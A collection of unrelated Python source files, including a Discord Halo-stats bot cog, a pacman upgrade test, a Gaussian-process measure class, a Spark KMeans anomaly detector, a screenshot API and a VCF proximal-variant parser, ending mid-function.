        data = await self.request_url("https://www.haloapi.com/metadata/h5/metadata/playlists")
        list_active = []
        for playlist in data:
            if playlist["isActive"]:
                list_active.append(playlist)
        await self.halo5_playlist_menu(ctx, list_active)

    async def halowars_playlist_menu(
        self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
    ):
        """menu control logic for this taken from
        https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
        s = post_list[page]
        created_at = ctx.message.created_at
        em = discord.Embed(
            title=s["View"]["Title"],
            colour=discord.Colour(value=self.random_colour()),
            timestamp=created_at,
        )
        em.set_image(url=s["View"]["HW2Playlist"]["Image"]["View"]["Media"]["MediaUrl"])
        if not message:
            message = await ctx.send(embed=em)
            await message.add_reaction("⬅")
            await message.add_reaction("❌")
            await message.add_reaction("➡")
        else:
            # message edits don't return the message object anymore lol
            await message.edit(embed=em)
        check = lambda react, user: user == ctx.message.author and react.emoji in ["➡", "⬅", "❌"]
        try:
            react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
        except asyncio.TimeoutError:
            await message.remove_reaction("⬅", self.bot.user)
            await message.remove_reaction("❌", self.bot.user)
            await message.remove_reaction("➡", self.bot.user)
            return None
        else:
            reacts = {v: k for k, v in numbs.items()}
            react = reacts[react.emoji]
            if react == "next":
                next_page = 0
                if page == len(post_list) - 1:
                    next_page = 0  # Loop around to the first item
                else:
                    next_page = page + 1
                return await self.halowars_playlist_menu(
                    ctx, post_list, message=message, page=next_page, timeout=timeout
                )
            elif react == "back":
                next_page = 0
                if page == 0:
                    next_page = len(post_list) - 1  # Loop around to the last item
                else:
                    next_page = page - 1
                return await self.halowars_playlist_menu(
                    ctx, post_list, message=message, page=next_page, timeout=timeout
                )
            else:
                return await message.delete()

    async def get_halo5_rank_data(self, designation_id, tier_id):
        """Resolve a CSR designation id and tier id into the designation
        name and the tier's icon image URL."""
        rank_data = await self.request_url(
            "https://www.haloapi.com/metadata/h5/metadata/csr-designations"
        )
        designation = [x for x in rank_data if x["id"] == str(designation_id)]
        image_url = [x["iconImageUrl"] for x in designation[0]["tiers"] if x["id"] == str(tier_id)]
        return designation[0]["name"], image_url

    @_halo5.command(name="rank")
    async def Halo5_rank(self, ctx, *, gamertag):
        """Gather player rank information from Halo 5"""
        # Embed colour per CSR designation name.
        colours = {
            "Unranked": "7f7f7f",
            "Bronze": "c27c0e",
            "Silver": "cccccc",
            # BUG FIX: was "xf1c40f" — an invalid hex string that made
            # int(..., 16) raise ValueError for any Gold-ranked player.
            "Gold": "f1c40f",
            "Platinum": "e5e5e5",
            "Diamond": "ffffff",
            "Onyx": "000000",
            "Champion": "71368a",
        }
        player_data = await self.request_url(
            "https://www.haloapi.com/stats/h5/servicerecords/arena?", {"players": gamertag}
        )
        tier = player_data["Results"][0]["Result"]["ArenaStats"]["HighestCsrAttained"]["Tier"]
        designation = player_data["Results"][0]["Result"]["ArenaStats"]["HighestCsrAttained"][
            "DesignationId"
        ]
        designation_name, image_url = await self.get_halo5_rank_data(designation, tier)
        embed = discord.Embed(
            title=gamertag,
            description=designation_name,
            colour=discord.Colour(value=int(colours[designation_name], 16)),
            timestamp=ctx.message.created_at,
        )
        embed.add_field(name="Designation", value=str(designation), inline=True)
        embed.add_field(name="Tier", value=str(tier), inline=True)
        embed.set_thumbnail(url=image_url[0])
        await ctx.send(embed=embed)

    @_halowars.command(name="playlist")
    async def halowars_playlist(self, ctx, active=True):
        """Gathers data about active Halo Wars 2 playlists"""
        data = await self.request_url("https://www.haloapi.com/metadata/hw2/playlists")
        list_active = []
        for playlist in data["ContentItems"]:
            if not playlist["View"]["HW2Playlist"]["Hide"]:
                list_active.append(playlist)
        await self.halowars_playlist_menu(ctx, list_active)

    @commands.group(name="haloset")
    @checks.is_owner()
    async def _haloset(self, ctx):
        """Command for setting required access information for the API.
        To get this info, visit https://developer.haloapi.com and create a new application."""
        pass

    @_haloset.command()
    async def tokens(self, ctx, subscription_key, language="en"):
        """Set the tokens and language for requests from the API"""
        await self.config.api_token.token.set(subscription_key)
        await self.config.api_token.language.set(language)
        await ctx.send("Halo API credentials set!")

    def cog_unload(self):
        # Close the shared HTTP session when the cog is unloaded.
        self.bot.loop.create_task(self.session.close())

    __unload = cog_unload
|
1689395
|
self.description = "Sysupgrade with ignored package prevent other upgrade"
# Local database: dependency chain pcre -> gcc-libs -> glibc, all at 1.0-1.
lp1 = pmpkg("glibc", "1.0-1")
lp2 = pmpkg("gcc-libs", "1.0-1")
lp2.depends = ["glibc>=1.0-1"]
lp3 = pmpkg("pcre", "1.0-1")
lp3.depends = ["gcc-libs"]
for p in lp1, lp2, lp3:
    self.addpkg2db("local", p)
# Sync database: the same three packages at 1.0-2; the new gcc-libs
# requires the new glibc, which will be ignored below.
sp1 = pmpkg("glibc", "1.0-2")
sp2 = pmpkg("gcc-libs", "1.0-2")
sp2.depends = ["glibc>=1.0-2"]
sp3 = pmpkg("pcre", "1.0-2")
sp3.depends = ["gcc-libs"]
for p in sp1, sp2, sp3:
    self.addpkg2db("sync", p)
# Upgrade everything while ignoring glibc.
# NOTE(review): --ask=16 pre-answers the question raised for the ignored
# package — confirm the value against pacman's question bitmask.
self.args = "-Su --ignore %s --ask=16" % sp1.name
# Expected: glibc and gcc-libs stay at 1.0-1 (gcc-libs 1.0-2 needs the
# ignored glibc>=1.0-2), but pcre still upgrades to 1.0-2.
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_VERSION=glibc|1.0-1")
self.addrule("PKG_VERSION=gcc-libs|1.0-1")
self.addrule("PKG_VERSION=pcre|1.0-2")
|
1689407
|
from types import FunctionType
from lab import B
from matrix import Constant
from mlkernels import (
num_elements,
ZeroKernel,
TensorProductKernel,
)
from plum import Union
from .fdd import FDD
from .gp import GP, assert_same_measure
from .observations import (
AbstractObservations,
Observations,
PseudoObservations,
combine,
)
from .. import _dispatch, PromisedMeasure
from ..lazy import LazyVector, LazyMatrix
from ..mo import MultiOutputKernel as MOK, MultiOutputMean as MOM
from ..random import Normal
__all__ = ["Measure"]
class Measure:
"""A GP model.
Attributes:
ps (list[:class:`.gp.GP`]): Processes of the measure.
mean (:class:`stheno.lazy.LazyVector`): Mean.
kernels (:class:`stheno.lazy.LazyMatrix`): Kernels.
default (:class:`.measure.Measure` or None): Global default measure.
"""
default = None
def __init__(self):
self.ps = []
self._pids = set()
self.means = LazyVector()
self.kernels = LazyMatrix()
# Store named GPs in both ways.
self._gps_by_name = {}
self._names_by_gp = {}
self._prev_default = None
def __enter__(self):
self._prev_default = self.default
Measure.default = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
Measure.default = self._prev_default
def __hash__(self):
# This is needed for :func:`.gp.intersection_measure_group`, which puts
# many :class:`.measure.Measure`s in a `set`. Every measure is unique.
return id(self)
@_dispatch
def __getitem__(self, name: str):
return self._gps_by_name[name]
@_dispatch
def __getitem__(self, p: GP):
return self._names_by_gp[id(p)]
@_dispatch
def name(self, p: GP, name: str):
"""Name a GP.
Args:
p (:class:`.gp.GP`): GP to name.
name (str): Name. Must be unique.
"""
# Delete any existing names and back-references for the GP.
if id(p) in self._names_by_gp:
del self._gps_by_name[self._names_by_gp[id(p)]]
del self._names_by_gp[id(p)]
# Check that name is not in use.
if name in self._gps_by_name:
raise RuntimeError(
f'Name "{name}" for "{p}" already taken by "{self[name]}".'
)
# Set the name and the back-reference.
self._gps_by_name[name] = p
self._names_by_gp[id(p)] = name
def _add_p(self, p):
# Attach process to measure.
self.ps.append(p)
self._pids.add(id(p))
# Add measure to list of measures of process.
p._measures.append(self)
def _update(self, p, mean, kernel, left_rule, right_rule=None):
# Update means.
self.means[p] = mean
# Update kernels.
self.kernels[p] = kernel
self.kernels.add_left_rule(id(p), self._pids, left_rule)
if right_rule:
self.kernels.add_right_rule(id(p), self._pids, right_rule)
else:
self.kernels.add_right_rule(
id(p), self._pids, lambda i: reversed(self.kernels[p, i])
)
# Only now add `p`: `self.pids` above needs to not include `id(p)`.
self._add_p(p)
return p
@_dispatch
def __call__(self, p: GP):
# Make a new GP with `self` as the prior.
p_copy = GP()
return self._update(
p_copy,
self.means[p],
self.kernels[p],
# `p_copy` acts like `p`.
lambda j: self.kernels[p, j], # Left rule
lambda i: self.kernels[i, p], # Right rule
)
@_dispatch
def __call__(self, fdd: FDD):
return self(fdd.p)(fdd.x, fdd.noise)
def add_independent_gp(self, p, mean, kernel):
"""Add an independent GP to the model.
Args:
p (:class:`.gp.GP`): GP to add.
mean (:class:`mlkernels.Mean`): Mean function of GP.
kernel (:class:`mlkernels.Kernel`): Kernel function of GP.
Returns:
:class:`.gp.GP`: The newly added independent GP.
"""
# Update means.
self.means[p] = mean
# Update kernels.
self.kernels[p] = kernel
self.kernels.add_left_rule(id(p), self._pids, lambda j: ZeroKernel())
self.kernels.add_right_rule(id(p), self._pids, lambda i: ZeroKernel())
# Only now add `p`: `self.pids` above needs to not include `id(p)`.
self._add_p(p)
return p
@_dispatch
def sum(self, p_sum: GP, other, p: GP):
"""Sum a GP from the graph with another object.
Args:
p_sum (:class:`.gp.GP`): GP that is the sum.
obj1 (other type or :class:`.gp.GP`): First term in the sum.
obj2 (other type or :class:`.gp.GP`): Second term in the sum.
Returns:
:class:`.gp.GP`: The GP corresponding to the sum.
"""
return self.sum(p_sum, p, other)
@_dispatch
def sum(self, p_sum: GP, p: GP, other: Union[B.Numeric, FunctionType]):
return self._update(
p_sum,
self.means[p] + other,
self.kernels[p],
lambda j: self.kernels[p, j],
)
@_dispatch
def sum(self, p_sum: GP, p1: GP, p2: GP):
assert_same_measure(p1, p2)
return self._update(
p_sum,
self.means[p1] + self.means[p2],
(
self.kernels[p1]
+ self.kernels[p2]
+ self.kernels[p1, p2]
+ self.kernels[p2, p1]
),
lambda j: self.kernels[p1, j] + self.kernels[p2, j],
)
@_dispatch
def mul(self, p_mul: GP, other, p: GP):
"""Multiply a GP from the graph with another object.
Args:
p_mul (:class:`.gp.GP`): GP that is the product.
obj1 (object): First factor in the product.
obj2 (object): Second factor in the product.
other (object): Other object in the product.
Returns:
:class:`.gp.GP`: The GP corresponding to the product.
"""
return self.mul(p_mul, p, other)
@_dispatch
def mul(self, p_mul: GP, p: GP, other: B.Numeric):
return self._update(
p_mul,
self.means[p] * other,
self.kernels[p] * other ** 2,
lambda j: self.kernels[p, j] * other,
)
@_dispatch
def mul(self, p_mul: GP, p: GP, f: FunctionType):
def ones(x):
return Constant(B.one(x), num_elements(x), 1)
return self._update(
p_mul,
f * self.means[p],
f * self.kernels[p],
lambda j: TensorProductKernel(f, ones) * self.kernels[p, j],
)
@_dispatch
def mul(self, p_mul: GP, p1: GP, p2: GP):
assert_same_measure(p1, p2)
term1 = self.sum(
GP(),
self.mul(GP(), lambda x: self.means[p1](x), p2),
self.mul(GP(), p1, lambda x: self.means[p2](x)),
)
term2 = self.add_independent_gp(
GP(),
-self.means[p1] * self.means[p2],
(
self.kernels[p1] * self.kernels[p2]
+ self.kernels[p1, p2] * self.kernels[p2, p1]
),
)
return self.sum(p_mul, term1, term2)
def shift(self, p_shifted, p, shift):
"""Shift a GP.
Args:
p_shifted (:class:`.gp.GP`): Shifted GP.
p (:class:`.gp.GP`): GP to shift.
shift (object): Amount to shift by.
Returns:
:class:`.gp.GP`: The shifted GP.
"""
return self._update(
p_shifted,
self.means[p].shift(shift),
self.kernels[p].shift(shift),
lambda j: self.kernels[p, j].shift(shift, 0),
)
def stretch(self, p_stretched, p, stretch):
"""Stretch a GP.
Args:
p_stretched (:class:`.gp.GP`): Stretched GP.
p (:class:`.gp.GP`): GP to stretch.
stretch (object): Extent of stretch.
Returns:
:class:`.gp.GP`: The stretched GP.
"""
return self._update(
p_stretched,
self.means[p].stretch(stretch),
self.kernels[p].stretch(stretch),
lambda j: self.kernels[p, j].stretch(stretch, 1),
)
def select(self, p_selected, p, *dims):
"""Select input dimensions.
Args:
p_selected (:class:`.gp.GP`): GP with selected inputs.
p (:class:`.gp.GP`): GP to select input dimensions from.
*dims (object): Dimensions to select.
Returns:
:class:`.gp.GP`: GP with the specific input dimensions.
"""
return self._update(
p_selected,
self.means[p].select(dims),
self.kernels[p].select(dims),
lambda j: self.kernels[p, j].select(dims, None),
)
def transform(self, p_transformed, p, f):
"""Transform the inputs of a GP.
Args:
p_transformed (:class:`.gp.GP`): GP with transformed inputs.
p (:class:`.gp.GP`): GP to input transform.
f (function): Input transform.
Returns:
:class:`.gp.GP`: Input-transformed GP.
"""
return self._update(
p_transformed,
self.means[p].transform(f),
self.kernels[p].transform(f),
lambda j: self.kernels[p, j].transform(f, None),
)
def diff(self, p_diff, p, dim=0):
"""Differentiate a GP.
Args:
p_diff (:class:`.gp.GP`): Derivative.
p (:class:`.gp.GP`): GP to differentiate.
dim (int, optional): Dimension of feature which to take the derivative
with respect to. Defaults to `0`.
Returns:
:class:`.gp.GP`: Derivative of GP.
"""
return self._update(
p_diff,
self.means[p].diff(dim),
self.kernels[p].diff(dim),
lambda j: self.kernels[p, j].diff(dim, None),
)
@_dispatch
def condition(self, obs: AbstractObservations):
"""Condition the measure on observations.
Args:
obs (:class:`.observations.AbstractObservations`): Observations to condition on.
Returns:
list[:class:`.gp.GP`]: Posterior processes.
"""
posterior = Measure()
posterior.ps = list(self.ps)
posterior._pids = set(self._pids)
posterior.means.add_rule(posterior._pids, lambda i: obs.posterior_mean(self, i))
posterior.kernels.add_rule(
posterior._pids, lambda i, j: obs.posterior_kernel(self, i, j)
)
# Update backreferences.
for p in posterior.ps:
p._measures.append(posterior)
return posterior
@_dispatch
def condition(self, fdd: FDD, y: B.Numeric):
return self.condition(Observations(fdd, y))
@_dispatch
def condition(self, pair: tuple):
return self.condition(Observations(*pair))
@_dispatch
def condition(self, *pairs: tuple):
return self.condition(Observations(*pairs))
@_dispatch
def __or__(self, *args):
return self.condition(*args)
@_dispatch
def cross(self, p_cross: GP, *ps: GP):
"""Construct the Cartesian product of a collection of processes.
Args:
p_cross (:class:`.gp.GP`): GP that is the Cartesian product.
*ps (:class:`.gp.GP`): Processes to construct the Cartesian product of.
Returns:
:class:`.gp.GP`: The Cartesian product of `ps`.
"""
mok = MOK(self, *ps)
return self._update(
p_cross,
MOM(self, *ps),
mok,
lambda j: mok.transform(None, lambda y: FDD(j, y)),
)
@_dispatch
def sample(self, state: B.RandomState, n: B.Int, *fdds: FDD):
    """Sample multiple processes simultaneously.

    Args:
        state (random state, optional): Random state.
        n (int, optional): Number of samples. Defaults to `1`.
        *fdds (:class:`.fdd.FDD`): Locations to sample at.

    Returns:
        tuple: Updated random state followed by one sample per FDD.
    """
    # Draw one joint sample so correlations between the FDDs are respected.
    state, sample = combine(*fdds).sample(state, n)
    # Unpack sample: slice the joint sample back into per-FDD pieces.
    lengths = [num_elements(fdd) for fdd in fdds]
    i, samples = 0, []
    for length in lengths:
        samples.append(sample[i : i + length, :])
        i += length
    return (state,) + tuple(samples)

@_dispatch
def sample(self, n: B.Int, *fdds):
    # Overload without an explicit random state: use and update the global one.
    res = self.sample(B.global_random_state(fdds), n, *fdds)
    state, samples = res[0], res[1:]
    B.set_global_random_state(state)
    return B.squeeze(samples)

@_dispatch
def sample(self, state: B.RandomState, *fdds: FDD):
    # Overload: default to a single sample.
    return self.sample(state, 1, *fdds)

@_dispatch
def sample(self, *fdds: FDD):
    # Overload: no state, single sample.
    return self.sample(1, *fdds)
@_dispatch
def logpdf(self, *pairs: Union[list, tuple]):
    """Compute the logpdf of one or multiple observations.

    Can also give an `AbstractObservations`.

    Args:
        *pairs (tuple[:class:`.fdd.FDD`, tensor]): Pairs of FDDs and values
            of the observations.

    Returns:
        scalar: Logpdf.
    """
    # Combine all pairs into one joint FDD/value, so the result is the joint
    # density under this measure.
    fdd, y = combine(*pairs)
    return self(fdd).logpdf(y)

@_dispatch
def logpdf(self, fdd: FDD, y: B.Numeric):
    # Overload: a single FDD with observed values.
    return self(fdd).logpdf(y)

@_dispatch
def logpdf(self, obs: Observations):
    # Overload: exact observations.
    return self.logpdf(obs.fdd, obs.y)

@_dispatch
def logpdf(self, obs: PseudoObservations):
    # Overload: pseudo-observations have no exact logpdf; return the ELBO
    # lower bound instead.
    return obs.elbo(self)
PromisedMeasure.deliver(Measure)
|
1689416
|
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import *
from pyspark.sql import Row
import operator
from pyspark.mllib.clustering import KMeans
# Build (or reuse) a local SparkSession for this job.
spark = SparkSession.builder \
    .master("local") \
    .appName("Anomalies Detection") \
    .config("spark.some.config.option", "some-value") \
    .getOrCreate()
sparkCt = spark.sparkContext
# Path to the input parquet file, taken from the command line.
inputs = sys.argv[1]
def to_onehot(lst, indices, unique_values, c):
    """One-hot encode the categorical positions of a raw feature row.

    The first ``c`` slots carry the one-hot encoding (1.0 at the position of
    each categorical value within ``unique_values``); the remaining slots are
    the non-categorical entries of ``lst`` cast to float, in original order.

    NOTE(review): lookup is done by wrapping the raw value in ``Row(...)`` so
    it matches the collected distinct rows — assumes single-field Rows compare
    equal by value; confirm against the caller.
    """
    encoded = [0.0] * c
    for pos in indices:
        encoded[unique_values.index(Row(lst[pos]))] = 1.0
    numeric_rest = [float(value) for k, value in enumerate(lst) if k not in indices]
    encoded.extend(numeric_rest)
    return encoded
class AnomalyDetection():
    """Anomaly detector: one-hot encodes categorical features, clusters rows
    with KMeans, and flags rows that belong to rare clusters."""

    def readData(self, filename):
        # Cache the raw parquet DataFrame; every later stage reads from it.
        self.rawDF = spark.read.parquet(filename).cache()

    def cat2Num(self, df, indices):
        # Add a "features" column: one-hot encoding of the categorical
        # positions in `indices` followed by the remaining numeric values.
        # NOTE(review): distinct values of *all* indexed columns are pooled
        # into a single list, so the one-hot segment spans every category of
        # every indexed column combined.
        unique_values = []
        for i in indices:
            # Project column i of the rawFeatures array as a string column.
            d = udf(lambda r: r[i], StringType())
            dt = df.select(d(df.rawFeatures)).distinct().collect()
            unique_values.extend(dt)
        unique_count = len(unique_values)
        convertUDF = udf(lambda r: to_onehot(r, indices, unique_values, unique_count), ArrayType(DoubleType()))
        newdf = df.withColumn("features", convertUDF(df.rawFeatures))
        return newdf

    def addScore(self, df):
        # Score each row by the rarity of its cluster:
        #   score = (n_max - n_cluster) / (n_max - n_min)
        # so the largest cluster scores 0.0 and the smallest scores 1.0.
        # NOTE(review): divides by zero if all clusters have equal size.
        cluster_dict = {}
        clusters_list = df.select("prediction").collect()
        for c in clusters_list:
            # Keys are the collected Row objects wrapping the cluster id.
            cluster_dict[c] = cluster_dict.setdefault(c,0.0)+1.0
        sorted_clusters = sorted(cluster_dict.items(), key=operator.itemgetter(1)) # sort by value
        n_max = sorted_clusters[-1][1]
        n_min = sorted_clusters[0][1]
        # Wrap the prediction in Row(...) so the lookup matches the dict keys
        # built from collect() above.
        score_udf = udf(lambda p: float(n_max - cluster_dict.get(Row(p)))/(n_max - n_min), DoubleType())
        score_df = df.withColumn("score", score_udf(df.prediction))
        return score_df

    def detect(self, k, t):
        """Run the full pipeline with k clusters; return rows scoring above t."""
        # Encoding categorical features using one-hot.
        df1 = self.cat2Num(self.rawDF, [0, 1]).cache()
        df1.show(n=2, truncate=False)
        # Clustering points using KMeans
        features = df1.select("features").rdd.map(lambda row: row[0]).cache()
        model = KMeans.train(features, k, maxIterations=40, initializationMode="random", seed=20)
        # Adding the prediction column to df1
        # Broadcast the model so executors don't re-serialize it per record.
        modelBC = sparkCt.broadcast(model)
        predictUDF = udf(lambda x: modelBC.value.predict(x), StringType())
        df2 = df1.withColumn("prediction", predictUDF(df1.features)).cache()
        df2.show(n=3, truncate=False)
        # Adding the score column to df2; The higher the score, the more likely it is an anomaly
        df3 = self.addScore(df2).cache()
        df3.show(n=3, truncate=False)
        return df3.where(df3.score > t)
def main():
    """Run the end-to-end anomaly-detection pipeline on the input parquet file."""
    detector = AnomalyDetection()
    detector.readData(inputs)
    detector.detect(8, 0.97).show()
# Script entry point.
if __name__ == "__main__":
    main()
|
1689440
|
import logging
from pyscreenshot.about import __version__
from pyscreenshot.childproc import childprocess_backend_version
from pyscreenshot.loader import FailedBackendError, backend_dict, backend_grab
# Re-exported so callers can catch loader failures from the package namespace.
ADDITIONAL_IMPORTS = [FailedBackendError]

log = logging.getLogger(__name__)
log.debug("version=%s", __version__)
def grab(bbox=None, childprocess=True, backend=None):
    """Copy the contents of the screen to PIL image memory.

    :param bbox: optional bounding box (x1,y1,x2,y2)
    :param childprocess: run back-end in new process using popen. (bool)
        This isolates back-ends from each other and from the main process.
        Leave it as it is (True) to have a safe setting.
        Set it False to improve performance, but then conflicts are possible.
    :param backend: back-end can be forced if set (examples:scrot, wx,..),
        otherwise back-end is automatic
    """
    # Validate the bounding box before handing off to the back-end.
    if bbox:
        left, top, right, bottom = bbox
        if right <= left:
            raise ValueError("bbox x2<=x1")
        if bottom <= top:
            raise ValueError("bbox y2<=y1")
    return backend_grab(backend, bbox, childprocess)
def backends():
    """Back-end names as a list.

    :return: back-ends as string list
    """
    return [name for name in backend_dict]
def backend_version(backend):
    """Return the version of the given back-end.

    :param backend: back-end name (examples: scrot, wx, ...)
    :return: version as string
    """
    # Queried in a child process, consistent with how grabs are performed.
    version = childprocess_backend_version(backend)
    return version
|
1689442
|
import vcf
import sys
import os
from lib.csq_parser import CsqParser
from Bio.Seq import translate
import lib.run_utils
class ProximalVariant:
    """Find VEP-annotated variants near a somatic variant of interest in a
    tabix-indexed phased VCF, and select the ones that are in-phase (or
    homozygous) missense changes on the transcript of interest."""

    #flanking_bases is the number of bases (not amino acids!) to search on each side of a variant position
    def __init__(self, proximal_variants_vcf, pass_only, flanking_bases):
        # Random access via fetch() requires a tabix index next to the VCF.
        if not os.path.exists(proximal_variants_vcf + '.tbi'):
            sys.exit('No .tbi file found for proximal variants VCF. Proximal variants VCF needs to be tabix indexed.')
        if lib.run_utils.is_gz_file(proximal_variants_vcf):
            mode = 'rb'
        else:
            mode = 'r'
        # Handle is kept open for the object's lifetime; vcf.Reader reads from it.
        self.fh = open(proximal_variants_vcf, mode)
        self.proximal_variants_vcf = vcf.Reader(self.fh)
        info_fields = self.proximal_variants_vcf.infos
        # The CSQ INFO description string defines the per-field annotation
        # format that CsqParser needs to parse VEP entries.
        if 'CSQ' not in info_fields:
            sys.exit('Proximal Variants VCF does not contain a CSQ header. Please annotate the VCF with VEP before running it.')
        if info_fields['CSQ'] is None:
            sys.exit('Failed to extract format string from info description for tag (CSQ)')
        self.csq_parser = CsqParser(info_fields['CSQ'].desc)
        self.pass_only = pass_only
        self.flanking_bases = flanking_bases

    def extract(self, somatic_variant, alt, transcript):
        """Return [entry, csq_entry] pairs of proximal variants relevant to
        (somatic_variant, alt) on `transcript`.

        A proximal variant is kept when it is on the same haplotype as the
        somatic variant (HP phasing tags match) or when zygosity guarantees
        co-occurrence (proximal variant hom-var while the somatic variant is
        het or hom-var). Returns [] when the somatic variant itself is not
        present in the phased file.
        """
        (phased_somatic_variant, potential_proximal_variants) = self.find_phased_somatic_variant_and_potential_proximal_variants(somatic_variant, alt, transcript)
        if phased_somatic_variant is None:
            print("Warning: Main somatic variant not found in phased variants file: {}, {}".format(somatic_variant, alt))
            return []
        if len(potential_proximal_variants) == 0:
            return []
        proximal_variants = []
        # NOTE(review): only the first sample of the VCF is considered.
        sample = self.proximal_variants_vcf.samples[0]
        phased_somatic_variant_genotype = phased_somatic_variant.genotype(sample)
        if 'HP' in phased_somatic_variant.FORMAT:
            # The somatic variant carries phasing information.
            somatic_phasing = phased_somatic_variant_genotype['HP']
            for (entry, csq_entry) in potential_proximal_variants:
                proximal_variant_genotype = entry.genotype(sample)
                #identify variants that are in phase with the phased_somatic_variant
                if 'HP' in entry.FORMAT:
                    proximal_variant_phasing = proximal_variant_genotype['HP']
                    if proximal_variant_phasing == somatic_phasing:
                        proximal_variants.append([entry, csq_entry])
                #proximal variant is hom var
                elif proximal_variant_genotype.is_variant and not proximal_variant_genotype.is_het:
                    #main somatic variant is het
                    if phased_somatic_variant_genotype.is_het:
                        proximal_variants.append([entry, csq_entry])
                    #main somatic variant is hom var
                    if phased_somatic_variant_genotype.is_variant and not phased_somatic_variant_genotype.is_het:
                        proximal_variants.append([entry, csq_entry])
        else:
            # No phasing on the somatic variant: only zygosity can establish
            # co-occurrence.
            for (entry, csq_entry) in potential_proximal_variants:
                proximal_variant_genotype = entry.genotype(sample)
                #proximal variant is hom var
                if proximal_variant_genotype.is_variant and not proximal_variant_genotype.is_het:
                    #main somatic variant is het
                    if phased_somatic_variant_genotype.is_het:
                        proximal_variants.append([entry, csq_entry])
                    #main somatic variant is hom var
                    if phased_somatic_variant_genotype.is_variant and not phased_somatic_variant_genotype.is_het:
                        proximal_variants.append([entry, csq_entry])
        return proximal_variants

    def find_phased_somatic_variant_and_potential_proximal_variants(self, somatic_variant, alt, transcript):
        """Scan the flanking window around `somatic_variant` and return a tuple
        of (the phased copy of the somatic variant itself or None,
        list of [entry, csq_entry] candidate missense proximal variants on
        `transcript`)."""
        potential_proximal_variants = []
        phased_somatic_variant = None
        # fetch() takes 0-based half-open coordinates; search flanking_bases on
        # each side of the somatic variant.
        for entry in self.proximal_variants_vcf.fetch(somatic_variant.CHROM, somatic_variant.start - self.flanking_bases, somatic_variant.end + self.flanking_bases):
            if self.pass_only:
                # A passing record has FILTER of None or an empty list.
                filt = entry.FILTER
                if not (filt is None or len(filt) == 0):
                    continue
            for proximal_alt in entry.ALT:
                # The somatic variant itself is recorded separately, not as a
                # proximal variant.
                if entry.start == somatic_variant.start and entry.end == somatic_variant.end and proximal_alt == alt:
                    phased_somatic_variant = entry
                    continue
                if 'CSQ' not in entry.INFO:
                    print("Warning: Proximal variant is not VEP annotated and will be skipped: {}".format(entry))
                    continue
                # Try the raw alt first; fall back to the VEP-normalized allele
                # representation when no entries match.
                alleles_dict = self.csq_parser.resolve_alleles(entry)
                csq_entries = self.csq_parser.parse_csq_entries_for_allele(entry.INFO['CSQ'], proximal_alt)
                if len(csq_entries) == 0:
                    csq_allele = alleles_dict[str(proximal_alt)]
                    csq_entries = self.csq_parser.parse_csq_entries_for_allele(entry.INFO['CSQ'], csq_allele)
                    if len(csq_entries) == 0:
                        print("Warning: Proximal variant does not contain any VEP annotations for alternate allele and will be skipped: {}".format(entry))
                        continue
                # Keep only the annotation for the transcript of interest.
                picked_csq_entry = None
                for csq_entry in csq_entries:
                    if csq_entry['Feature'] == transcript:
                        picked_csq_entry = csq_entry
                if picked_csq_entry is None:
                    print("Warning: Proximal variant has no transcript annotation for somatic variant of interest transcript {} and will be skipped: {}".format(transcript, entry))
                    continue
                # Only missense changes can alter the peptide sequence here.
                consequences = {consequence.lower() for consequence in picked_csq_entry['Consequence'].split('&')}
                if 'missense_variant' not in consequences:
                    print("Warning: Proximal variant is not a missense mutation and will be skipped: {}".format(entry))
                    continue
                potential_proximal_variants.append([entry, picked_csq_entry])
        return (phased_somatic_variant, potential_proximal_variants)

    @classmethod
    def combine_conflicting_variants(cls, codon_changes):
        """Merge several "old/new" codon change strings affecting the same
        codon into one codon and return the translated amino acid.

        Each element of `codon_changes` is a VEP-style "ref_codon/alt_codon"
        string; changed bases are applied in order onto the reference codon.
        """
        codon = list(codon_changes[0].split('/')[0].lower())
        modified_positions = []
        for codon_change in codon_changes:
            (old_codon, new_codon) = codon_change.split('/')
            change_positions = [i for i in range(len(old_codon)) if old_codon[i] != new_codon[i]]
            for position in change_positions:
                # A later change overwrites an earlier one at the same base.
                if position in modified_positions:
                    print("Warning: position has already been modified")
                codon[position] = new_codon[position].lower()
                modified_positions.append(position)
        return translate("".join(codon))
|
1689461
|
import sys
import os
from selexp import *
def fn2type(x):
    """Classify a result filename into its selection-method type.

    Returns one of 'CLUSTER_1_ITER', 'CLUSTER', 'GREEDY', 'D2', or, for
    greedy runs with an outlier fraction encoded in the name, the tuple
    ('OUTLIERS', fraction). Earlier checks take precedence, so a name
    containing both markers is classified by the first match.

    Raises:
        RuntimeError: if no known marker is present in `x`.
    """
    if 'CLUSTER_1_ITER' in x:
        return 'CLUSTER_1_ITER'
    if 'CLUSTER' in x:
        return 'CLUSTER'
    if 'GREEDY' in x:
        if 'OUTLIERS' in x:
            # The fraction sits between "OUTLIERS_" and the next underscore.
            fraction = x.split("OUTLIERS_")[1].split("_")[0]
            return ('OUTLIERS', float(fraction))
        return 'GREEDY'
    if 'D2' in x:
        return 'D2'
    raise RuntimeError("Not Expected: anything else")
def fn2measure(fn):
    """Return the measure name embedded in filename `fn`.

    Of all entries of MEASURES that occur as substrings, the longest wins,
    so a measure that is a prefix of another cannot shadow it.
    """
    matches = [measure for measure in MEASURES if measure in fn]
    return sorted(matches, key=lambda measure: -len(measure))[0]
def load_centers(path):
    """Read one integer center index per line from the file at `path`.

    Args:
        path: path to a text file with one integer per line (surrounding
            whitespace is tolerated).

    Returns:
        list[int]: the parsed center indices, in file order.

    Raises:
        ValueError: if a non-blank line is not a valid integer, or on a
            blank line (same as the original behavior).
    """
    # Use a context manager so the handle is closed deterministically; the
    # original left the file object open (resource leak).
    with open(path) as fh:
        return [int(line.strip()) for line in fh]
def make_table(paths):
    """Placeholder for tabulating results from the files in `paths`.

    Validates that every path exists, then fails: the tabulation itself has
    not been written yet.

    Raises:
        AssertionError: if any path in `paths` is not an existing file.
        NotImplementedError: always, once validation passes.
    """
    assert all(os.path.isfile(p) for p in paths)
    raise NotImplementedError("make_table")
def centers2res(ctrs, trueset, samples=None):
    """Count how many selected centers fall in the ground-truth set, for each
    prefix length.

    Args:
        ctrs: ordered list of selected center ids.
        trueset: ground-truth ids (any iterable; converted to a set).
        samples: prefix lengths to evaluate; defaults to 1..len(ctrs).

    Returns:
